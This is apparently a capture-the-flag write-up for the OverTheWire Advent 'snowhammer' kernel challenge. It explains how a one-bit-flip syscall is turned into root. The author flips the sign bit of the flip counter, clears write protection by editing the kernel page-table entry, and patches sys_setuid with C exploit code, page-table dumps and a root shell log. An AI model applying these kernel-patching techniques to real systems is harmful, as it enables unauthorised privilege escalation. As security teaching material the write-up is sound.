The Challenge

This was the third of a series of challenges for the final day of AOTW. The challenge consists of a linux kernel and userland running in qemu. On boot we get the following message and are dropped into an unprivileged shell:


███████╗███╗   ██╗ ██████╗ ██╗    ██╗ ██╗  ██╗ █████╗ ███╗   ███╗███╗   ███╗███████╗██████╗ 
██╔════╝████╗  ██║██╔═══██╗██║    ██║ ██║  ██║██╔══██╗████╗ ████║████╗ ████║██╔════╝██╔══██╗
███████╗██╔██╗ ██║██║   ██║██║ █╗ ██║ ███████║███████║██╔████╔██║██╔████╔██║█████╗  ██████╔╝
╚════██║██║╚██╗██║██║   ██║██║███╗██║ ██╔══██║██╔══██║██║╚██╔╝██║██║╚██╔╝██║██╔══╝  ██╔══██╗
███████║██║ ╚████║╚██████╔╝╚███╔███╔╝ ██║  ██║██║  ██║██║ ╚═╝ ██║██║ ╚═╝ ██║███████╗██║  ██║
╚══════╝╚═╝  ╚═══╝ ╚═════╝  ╚══╝╚══╝  ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
                                                                                               
════════════════════════════════════════════════════════════════════════════════════════════╗
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/sched.h>
#include <linux/syscalls.h>random: fast init done


#define MAXFLIP 1

#ifndef __NR_SNOWHAMMER
#define SNOWHAMMER 333
#endif

long flip_count = 0;
EXPORT_SYMBOL(flip_count);

SYSCALL_DEFINE2(snowhammer, long *, addr, long, bit)
{
        if (flip_count >= MAXFLIP)
        {
                printk(KERN_INFO "snowhammer: sorry :/\n");
                return -EPERM;
        }

        *addr ^= (1ULL << (bit));
        flip_count++;

        return 0;
}
════════════════════════════════════════════════════════════════════════════════════════════╝
/ $

Just like the challenge’s namesake we basically get to flip a bit in kernel, but with the restriction that we can only flip one bit, and it has to be in writeable memory.

Recon

The first thing I like to do when approaching a kernel exploitation challenge is to gather as much information about the kernel as possible. When we get a local qemu instance, that usually means patching the initrd to give us a root shell to look around with. Here, b0bb was nice to us and left us /proc/kallsyms so I extracted that.

Some interesting observations for later on:

  • We’re running Linux version 4.17.0
  • kaslr is off
  • /home/snowhammer is the only writeable location as the unprivileged user.
  • we have glibc, a pretty full busybox including base64 and gzip.

The next thing we can do to prepare is to unpack a useable linux kernel ELF using the appropriate extract-vmlinux script.

Dead ends and new beginnings

My first idea was to follow the rough plan of the Project Zero rowhammer exploit (exploit code), that is to mmap a large area in userspace, then flip a bit in the page table entry for the mmaped region to shift physical address so that the region contains its own page table entry. We can then overwrite the page table entry to point to arbitrary kernel memory and patch a rootkit into the kernel.

After playing around with /proc/self/pagemap it became clear though that this would be difficult because

  • /proc/<pid>/pagemap is not readable as an unprivileged user, so we will have difficulties reliably predicting the physical address of the region (it shifts around depending on e.g. size of the exploit code etc.)
  • we don’t have a reliable way of predicting the page table entry for the region
  • we are flipping bits in virtual memory address space anyways ¯\_(ツ)_/¯

So this seemed like a dead end. And what do you do when you hit a dead end? Right, recycle old exploits! That’s greener, better for the environment, just like hxp’s Green Computing challenge. However, to implement that attack, we need to be able to overwrite arbitrary kernel memory, and flipping one bit doesn’t seem to get us that far, right?

Really, just one bit?

One oddity of the vulnerable patch that m noticed is that flip_count is a signed long, which means that if we flip bit 63 of it, it becomes negative and we can flip many more (>9000) bits:

puts("[+] flipping off the flip_count\n");
long *flip_count = (long *) 0xffffffff818f6f78;
assert(syscall(333, flip_count, 63) == 0);

flipping off the flip_count

We now only have to make sure to only run this script once per boot otherwise we lock ourselves out (which happened to me way too many times - I should really have left a marker file on the file system for this…).

The patch

While re-using the patch from Green Computing, I noticed that while it worked there (patching happened before init was called, so just breaking the initial setuid syscall that gave us a restricted shell was sufficient there) - there’s a bit of a flaw in my Green Computing rootkit: We also need to patch the prepare_creds to become a prepare_kernel_creds! Adjusting the offsets gives us two 2-byte patches:

// 0xffffffff8102b734: 0f 84 --> eb 4d - patch the jump
// 0xffffffff8102b723: 31 7d --> 2f 7f - prepare_creds -> prepare_kernel_creds

We can write a small 16 bit patch routine that flips the correct bits:

void patch16(long *patch_target, unsigned short old, unsigned short new) {
	unsigned short diff = old ^ new;
	for (int bit = 0; bit < 16; bit++) {
		if (diff & (1<<bit))
			assert(syscall(333, patch_target, bit) == 0);
	}
}

And patch dat kernel!

puts("[+] patching the patches\n");
patch16((long*) 0xffffffff8102b734, 0x840f, 0x4deb);
patch16((long*) 0xffffffff8102b723, 0x7d31, 0x7f2c);

But the kernel .text can’t possibly be writeable …?

The Green Computing exploit relies on patching the sys_setuid handler, which resides in non-writeable kernel memory. When we attempt to patch anything in there, we get a horrible kernel panic:

BUG: unable to handle kernel paging request at ffffffff8102b734
PGD 1816067 P4D 1816067 PUD 1817063 PMD 10001e1
Oops: 0003 [#1] NOPTI
CPU: 0 PID: 45 Comm: pwn Not tainted 4.17.0 #1
RIP: 0010:__x64_sys_snowhammer+0x2b/0x38
RSP: 0018:ffffc9000007ff38 EFLAGS: 00000202
RAX: 0000000000000002 RBX: ffffc9000007ff58 RCX: 0000000000000001
RDX: ffffffff8102b734 RSI: ffffc9000007ff58 RDI: ffffc9000007ff58
RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
FS:  00007fbb83fd84c0(0000) GS:ffffffff8182a000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffff8102b734 CR3: 00000000075f0000 CR4: 00000000000006b0
Call Trace:
 ? do_syscall_64+0x7b/0x89
 ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
 ? __sys_setuid+0x29/0xb9
Code: 48 83 3d bc a4 84 00 00 48 8b 4f 68 48 8b 57 70 7e 11 48 c7 c7 c6 6f 66 81 e8 d4 23 f9 ff 48 83
c8 ff c3 b8 01 00 00 00 48 d3 e0 <48> 31 02 31 c0 48 ff 05 8d a4 84 00 c3 ff 07 c3 8b 17 31 c0 85
RIP: __x64_sys_snowhammer+0x2b/0x38 RSP: ffffc9000007ff38
CR2: ffffffff8102b734
---[ end trace 6ae088dc1b6d625d ]---
Kernel panic - not syncing: Fatal exception
Kernel Offset: disabled
---[ end Kernel panic - not syncing: Fatal exception ]---

To make the kernel writeable, we need to … flip a bit, which we can do with our syscall. That bit is the writeable bit of the page table entry that maps the kernel. So let me take you on a trip through the magical land of x86_64 page tables…

We start our journey by patching the run.sh script to give us a qemu monitor. I personally use -monitor tcp::5555,server,nowait, but whatever floats your goat is also fine.

Once we attach to the qemu monitor port, we grab a complete memory dump as well as the value of the CR3 register which points to the top-level page table directory:

(qemu) pmemsave 0 0x8000000 memdump
(qemu) info registers
[...]
CR0=80050033 CR2=0000000002654060 CR3=00000000075de000 CR4=000006b0
[...]

The virtual addresses we want to resolve in sys_setuid are 0xFFFFFFFF8102B734 and 0xFFFFFFFF8102B723 which would fall in the same 4kiB page at 0xFFFFFFFF8102B000.

Splitting this up, we find the indices into the page directories and page tables:

        0b 1111111111111111 111111111 111111110 000001000 000101011 000000000000
           \______  ______/ \___  __/ \___  __/ \___  __/ \___  __/ \____  ____/
                  \/            \/        \/        \/        \/         \/
length          16 bit        9 bit     9 bit     9 bit     9 bit      12 bit
idx into    sign extension     PML4      PML3   Page Table   PTE       offset

value                          511       510         8        43

We dump the PML4 at the address specified in CR3:

xxd -e -g8 -c8 -a -s 0x75de000 -l 0x1000 memdump
075de000: 0000000002379067  g.7.....
075de008: 0000000000000000  ........
*
075de7f8: 00000000075db067  g.].....
075de800: 0000000000000000  ........
*
075de880: 00000000018fa067  g.......
075de888: 0000000000000000  ........
*
075dec90: 000000000008a067  g.......
075dec98: 0000000000000000  ........
*
075deea0: 000000000636c067  g.6.....
075deea8: 0000000000000000  ........
*
075defe0: 0000000006b6b067  g.......
075defe8: 0000000000000000  ........
075deff0: 0000000000000000  ........
075deff8: 0000000001816067  g`......

The entry at index 511 (offset 0xff8) is 0x1816067, which indicates that the next page directory can be found at physical address 0x1816000:

xxd -e -g8 -c8 -a -s 0x1816000 -l 0x1000 memdump
01816000: 0000000000000000  ........
*
01816ff0: 0000000001817063  cp......
01816ff8: 0000000001818067  g.......

The entry at index 510 (offset 0xff0) is 0x1817063, meaning we look at 0x1817000 next:

xxd -e -g8 -c8 -a -s 0x1817000 -l 0x1000 memdump
01817000: 0000000000000000  .......c.
*
01817040: 00000000010001e1  ........
01817048: 00000000012001e1  .. .....
01817050: 000000000227e163  c.'.....
01817058: 80000000016001e1  ..`.....
01817060: 000000000227d063  c.'.....
01817068: 0000000000000000  ........
*
01817ff8: 0000000000000000  ........

The entry at index 8 (offset 0x40) here is interesting: 0000000001000000 is the physical address of the kernel, and the flags 0xe1 reduce to:

0x1817040: 0b11100001
               \   \\\_ present
                \   \\_ not writeable
                 \   \_ not user accessible
                  \____ 2 MiB page (not an index into page table)

Since the kernel is a 2 MiB page, we can stop descending the page table, look up the virtual address this page table entry is mapped to using info tlb and just flip the writeable bit here:

// 0xffffffff81817000: 0000000001817000 XG-DA---W
printf("[+] writing writeable\n");
assert(syscall(333, 0xffffffff81817040, 1) == 0);

The grand finale

We can now trigger sys_setuid to get a shell:

puts("[+] syscalling the syscall\n");
syscall(__NR_setuid, 0);

puts("[+] shelling a shell\n");
system("/bin/sh");
~ $ ./pwn
[+] flipping off the flip_count
[+] writing writeable
[+] patching the patches
[+] syscalling the syscall
[+] shelling a shell
/home/snowhammer # id
uid=0(root) gid=0(root) groups=0(root)
/home/snowhammer # cd /root
~ # cat flag
AOTW{tH1s_gUy_ChRisTm4sSes}

Thanks to b0bb for this fun finale to the OverTheWire Advent Bonanza!

– plonk